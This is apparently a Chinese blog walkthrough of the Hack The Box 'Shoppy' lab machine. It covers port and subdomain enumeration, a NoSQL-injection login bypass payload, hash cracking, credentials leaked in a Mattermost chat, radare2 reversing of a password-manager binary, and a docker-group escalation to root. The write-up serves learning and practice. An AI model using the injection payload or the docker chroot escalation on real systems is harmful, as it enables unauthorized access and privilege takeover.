HTB-Shoppy


HTB-Shoppy

一、思路概要

  1. 信息收集目录枚举得到/login页面;

  2. 万能密码登录/login页面;

  3. 再次万能密码拿到josh账户(非ssh账户);

  4. 枚举子域得到mattermost子域;

  5. josh账户登录mattermost子域并分析页面拿到ssh账户;

  6. 连上ssh账户sudo -l发现可执行文件;

  7. 逆向分析可执行文件拿到deploy账户;

  8. docker提权获取root权限。

二、信息收集

nmap(用如下两步,先扫全端口,再指定端口定向扫描服务、版本相关信息,有助于提升扫描速度)

┌──(root💀kali)-[~/Desktop]
└─# nmap -p- --min-rate 10000 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:15 EDT
Nmap scan report for 10.129.92.247
Host is up (0.33s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds
┌──(root💀kali)-[~/Desktop]
└─# nmap -p 22,80,9093 -sCV 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:24 EDT
Nmap scan report for 10.129.92.247
Host is up (0.32s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 31 Mar 2023 08:24:50 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 15
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 15
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.8824e-05
|     go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|     go_gc_d
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 31 Mar 2023 08:24:51 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 15
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 15
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 2.8824e-05
|     go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|_    go_gc_d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.91%I=7%D=3/31%Time=642698D4%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,152D,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Fri,\x2
SF:031\x20Mar\x202023\x2008:24:50\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_
SF:total\x2015\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\
SF:x20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20applicatio
SF:n\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc
SF:_cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc
SF:_cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x
SF:20TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_t
SF:otal_gc_cycles_total\x2015\n#\x20HELP\x20go_gc_duration_seconds\x20A\x2
SF:0summary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collecti
SF:on\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_d
SF:uration_seconds{quantile=\"0\"}\x202\.8824e-05\ngo_gc_duration_seconds{
SF:quantile=\"0\.25\"}\x207\.6212e-05\ngo_gc_d")%r(HTTPOptions,1A5A,"HTTP/
SF:1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x
SF:20charset=utf-8\r\nDate:\x20Fri,\x2031\x20Mar\x202023\x2008:24:51\x20GM
SF:T\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20ru
SF:ntime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter
SF:\ngo_gc_cycles_automatic_gc_cycles_total\x2015\n#\x20HELP\x20go_gc_cycl
SF:es_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_force
SF:d_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\
SF:n#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\
SF:x20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycl
SF:es_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x2015\n#\x20HEL
SF:P\x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20du
SF:ration\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_d
SF:uration_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x202
SF:\.8824e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x207\.6212e-05\n
SF:go_gc_d");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.77 seconds

开放端口:22(ssh)、80(http)、9093(copycat),获得域名shoppy.htb

将域名添加进本地hosts文件

echo "10.129.92.247 shoppy.htb" >> /etc/hosts

浏览器打开shoppy.htb

枚举子目录

┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 100 -mc 200,302,301 -u http://shoppy.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shoppy.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,302,301
________________________________________________

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 413ms]
    * FUZZ: admin

[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 414ms]
    * FUZZ: images

[Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 417ms]
    * FUZZ: js

[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 435ms]
    * FUZZ: assets

[Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 441ms]
    * FUZZ: css

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 468ms]
    * FUZZ: login

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 323ms]
    * FUZZ: Admin

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 429ms]
    * FUZZ: Login

[Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 335ms]
    * FUZZ: fonts

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 327ms]
    * FUZZ: ADMIN

[Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 332ms]
    * FUZZ: exports

[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 376ms]
    * FUZZ: 

[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 330ms]
    * FUZZ: LOGIN

:: Progress: [20116/20116] :: Job [1/1] :: 282 req/sec :: Duration: [0:01:06] :: Errors: 0 ::

枚举到的目录,301的页面都没东西,302的都重定向到/login目录

三、万能密码

访问shoppy.htb/login

用户名输入如下,密码任意(万能密码),成功登录

admin'||'1==1

点击页面右上角搜索标签,再次输入万能密码,弹出如下Download export标签

点击Download export标签,得到两组账户,adminjosh

[{
	"_id": "62db0e93d6d6a999a66ee67a",
	"username": "admin",
	"password": "23c6877d9e2b564ef8b32c3a23de27b2"
},
{
	"_id": "62db0e93d6d6a999a66ee67b",
	"username": "josh",
	"password": "6ebcea65320589ca4f2f1ce039975995"
}]

破解hash:https://crackstation.net/

josh
remembermethisway

用该账户登录ssh,不对

遂用wfuzz枚举子域名,发现很多301

┌──(root💀kali)-[~/Desktop]
└─# wfuzz -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt             
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.129.92.247/
Total requests: 4989
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                   
=====================================================================
000000001:   301        7 L      11 W       169 Ch      "www"
000000020:   301        7 L      11 W       169 Ch      "www2"
000000019:   301        7 L      11 W       169 Ch      "dev"
000000015:   301        7 L      11 W       169 Ch      "ns"
000000003:   301        7 L      11 W       169 Ch      "ftp"
000000021:   301        7 L      11 W       169 Ch      "ns3"
000000022:   301        7 L      11 W       169 Ch      "pop3"
000000018:   301        7 L      11 W       169 Ch      "blog"
......

再用ffuf提速枚举子域名(wfuzz这个速度有点窒息,用ffuf或gobuster提速),并且换个大字典,过滤301响应

┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -fc 301 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.92.247
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

[Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 318ms]
    * FUZZ: mattermost

:: Progress: [100000/100000] :: Job [1/1] :: 100 req/sec :: Duration: [0:13:49] :: Errors: 0 ::

发现mattermost子域名,添加进本地hosts文件

echo "10.129.92.247 mattermost.shoppy.htb" >> /etc/hosts

访问mattermost.shoppy.htb

用刚刚的josh账户登录,在左侧Deploy Machine栏,聊天记录里发现jaeger账户

username: jaeger
password: Sh0ppyBest@pp!

ssh连上(IP有变化是因为重启了靶机环境)

┌──(root💀kali)-[~/Desktop]
└─# ssh jaeger@10.129.93.16
jaeger@10.129.93.16's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$ pwd
/home/jaeger

sudo -l查看此用户权限

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

发现可执行命令/home/deploy/password-manager,用如下步骤下载到本地

在ssh窗口开启http服务

jaeger@shoppy:/home/deploy$ python3 -m http.server 9898
Serving HTTP on 0.0.0.0 port 9898 (http://0.0.0.0:9898/) ...

然后在本地用如下命令下载

wget http://10.129.93.16:9898/password-manager

本地用file命令查看文件信息

┌──(root💀kali)-[~/Desktop]
└─# file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped

是64位ELF(Executable and Linkable Format)文件

四、逆向分析

radare2工具逆向静态分析一下

参考:https://blog.csdn.net/qq_28429161/article/details/107810534

r2 password-manager

输入如下指令,定位main函数地址

> aaa	#自动分析并命名函数
> afl	#查看程序内的函数

找到main函数,然后定位到main函数的地址并查看汇编代码

> s main  //定位到main函数入口
> pdf  //查看当前函数的汇编代码

如上图,int main()和域运算符::表明这是C++程序,运行会先打印Welcome to Josh password manager!

然后打印Please enter your master password: ,并接收键盘输入,如下图

然后将键盘输入与Sample逐一字符对比

对比相同后,会打印Access granted! Here is creds !,然后调用system()函数执行cat命令,查看/home/deploy/creds.txt内容

回到靶机ssh窗口,运行如下命令,提示Please enter your master password:时,输入Sample

jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger: 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

可看到已得到账户deploy的用户名密码,执行su deploy切换到deploy账户

看到deploy用户属于docker组,在如下网站搜索docker

https://gtfobins.github.io/

五、docker提权

看到如下提权命令

为了让获得的shell环境更稳定,把后面的sh换成bash,执行

deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash

成功获取root权限

Over!

参考

https://blog.csdn.net/qq_45894840/article/details/127527914

https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html


文章作者: wa0er
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 wa0er !
评论
  目录